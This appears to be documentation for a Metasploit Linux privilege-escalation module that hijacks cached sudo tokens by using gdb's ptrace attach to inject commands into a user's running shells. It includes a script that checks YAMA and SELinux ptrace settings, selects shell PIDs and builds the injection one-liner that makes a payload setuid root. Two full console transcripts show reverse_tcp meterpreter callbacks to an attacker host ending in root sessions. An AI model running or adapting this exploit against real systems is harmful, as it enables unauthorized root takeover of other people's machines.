## Description

  This module attempts to gain root privileges by blindly injecting into
  each of the session user's running shell processes, using gdb's ptrace
  attach to call `system()` inside the process, in the hope that one of
  those shells holds a valid cached sudo token. sudo caches a successful
  authentication for `timestamp_timeout` minutes (15 by default), and
  when `tty_tickets` is enabled the token is bound to the shell's
  terminal, which is why the command has to run from inside a shell the
  user recently ran `sudo` in rather than from the session itself. Once
  an injection succeeds, the uploaded payload is made setuid root and
  executed. Attaching with ptrace stops the target shell while the
  command runs, so an interactive user may notice a brief hang, and the
  injected `sudo` invocation may be logged.

  The target must have gdb and sudo installed and must permit an
  unprivileged user to ptrace their own processes: YAMA
  `kernel.yama.ptrace_scope` must be `0` (or YAMA absent), and on
  SELinux systems the `deny_ptrace` boolean must be off. The `check`
  command tests these preconditions.
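
The precondition checks and target selection described above, as an added shell illustration written for this page; it is not the Metasploit module's own code. It evaluates the YAMA and SELinux settings, confirms that `gdb` and `sudo` are present, picks shell PIDs out of `ps` output, and prints (without executing) the gdb one-liner that would call `system()` in each shell. The exact form of that one-liner, and the `sudo -n chown` / `chmod 4755` command it carries, are assumptions modelled on the module's output, not copied from the module.

```shell
#!/bin/sh
# Added illustration of the preconditions and target selection behind the
# ptrace/sudo-token technique. Not the Metasploit module's code; the gdb
# command line built below is an assumed rendering of "call system() in
# the shell via gdb", not copied from the module.

# YAMA: only ptrace_scope 0 lets an unprivileged process attach to an
# arbitrary process of the same uid. 1 restricts attach to descendants,
# 2 requires CAP_SYS_PTRACE, 3 disables attach entirely. An empty value
# means the sysctl file is absent (YAMA not built in), which also permits
# attach.
yama_permits_ptrace() {
  scope="$1"
  [ -z "$scope" ] || [ "$scope" = "0" ]
}

# SELinux: the deny_ptrace boolean blocks ptrace regardless of YAMA.
# Argument is the output of `getsebool deny_ptrace` ("" if no SELinux).
selinux_permits_ptrace() {
  case "$1" in
    *"--> on"*) return 1 ;;
    *)          return 0 ;;
  esac
}

# Select shell PIDs from `ps -o pid=,comm=` text, one PID per line.
# Login shells may show up with a leading '-'.
shell_pids() {
  printf '%s\n' "$1" |
    awk '$2 ~ /^-?(sh|bash|dash|zsh|ksh|fish)$/ { print $1 }'
}

# The one-liner that attaches to PID and calls system() in its context.
# `sudo -n` fails instead of prompting when no token is cached, so a
# shell without a token errors out rather than hanging on a password
# prompt. On success the payload file becomes setuid root.
gdb_inject_cmd() {
  pid="$1"
  path="$2"
  printf "gdb -q -n -p %s -batch -ex 'call (int)system(\"sudo -n chown root:root %s && sudo -n chmod 4755 %s\")'" \
    "$pid" "$path" "$path"
}

# Live dry run against the current host: report the preconditions and
# print the commands that would be injected. Nothing is attached to.
scope=$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || true)
sebool=$(getsebool deny_ptrace 2>/dev/null || true)
if yama_permits_ptrace "$scope"; then
  echo "[+] YAMA ptrace_scope=${scope:-absent}: attach permitted"
else
  echo "[-] YAMA ptrace_scope=$scope: attach blocked"
fi
if selinux_permits_ptrace "$sebool"; then
  echo "[+] SELinux deny_ptrace is off or SELinux is absent"
else
  echo "[-] SELinux deny_ptrace is on"
fi
for tool in gdb sudo; do
  if command -v "$tool" >/dev/null 2>&1; then
    echo "[+] $tool is installed"
  else
    echo "[-] $tool is missing"
  fi
done
ps_out=$(ps -u "$(id -u 2>/dev/null)" -o pid=,comm= 2>/dev/null || true)
for pid in $(shell_pids "$ps_out"); do
  echo "[*] would run: $(gdb_inject_cmd "$pid" /tmp/.payload)"
done
```

Run it as the unprivileged user on the target to see whether the module's `check` should pass and which shells would be tried; it only prints the gdb lines, so it is safe to run on a host you are not yet ready to touch.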


## Vulnerable Application

  This module has been tested successfully on:

  * Debian 9.8 (x64)
  * CentOS 7.4.1708 (x64)


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/ptrace_sudo_token_priv_esc`
  4. `set SESSION <SESSION>`
  5. `check` (confirms the YAMA and SELinux ptrace settings and that `sudo` and `gdb` are present)
  6. `run`
  7. You should get a new *root* session


## Options

  **SESSION**

  The session to run this module on. List available sessions with `sessions`.

  **TIMEOUT**

  Timeout in seconds for the process injection step (default: `30`)

  **WritableDir**

  A writable directory file system path where the payload is written
  (default: `/tmp`). The module makes that file setuid root during
  exploitation, so the original unprivileged session can no longer delete
  it afterwards (the `Failed to delete` line in the scenarios below);
  remove it from the root session instead.


## Scenarios

### CentOS 7.4.1708 (x64)
  
  ```
  msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] YAMA ptrace scope is not restrictive
  [+] SELinux deny_ptrace is disabled
  [+] sudo is installed
  [+] gdb is installed
  [*] Searching for shell processes ...
  [*] Found 3 running shell processes
  [*] 2343, 2483, 2958
  [*] Writing '/tmp/.ka44kFCm8XyMEZ' (329 bytes) ...
  [*] Injecting into process 2343 ...
  [*] Injecting into process 2483 ...
  [*] Injecting into process 2958 ...
  [+] /tmp/.ka44kFCm8XyMEZ setuid root successfully
  [*] Executing payload...
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (3021284 bytes) to 172.16.191.141

  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.141:53462) at 2019-08-10 02:49:48 -0400
  [-] Failed to delete /tmp/.ka44kFCm8XyMEZ: stdapi_fs_delete_file: Operation failed: 1

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : centos-7-1708.localdomain
  OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```

### Debian 9.8 (x64)

  ```
  msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] YAMA ptrace scope is not restrictive
  [+] sudo is installed
  [+] gdb is installed
  [*] Searching for shell processes ...
  [*] Found 5 running shell processes
  [*] 661, 891, 23499, 23518, 23541
  [*] Writing '/tmp/.Dpq90j6vOk' (329 bytes) ...
  [*] Injecting into process 661 ...
  [*] Injecting into process 891 ...
  [*] Injecting into process 23499 ...
  [*] Injecting into process 23518 ...
  [+] /tmp/.Dpq90j6vOk setuid root successfully
  [*] Executing payload...
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (3021284 bytes) to 172.16.191.232

  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.232:50744) at 2019-08-10 02:54:34 -0400
  [-] Failed to delete /tmp/.Dpq90j6vOk: stdapi_fs_delete_file: Operation failed: 1

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : debian-9-8-x64.local
  OS           : Debian 9.8 (Linux 4.9.0-8-amd64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```

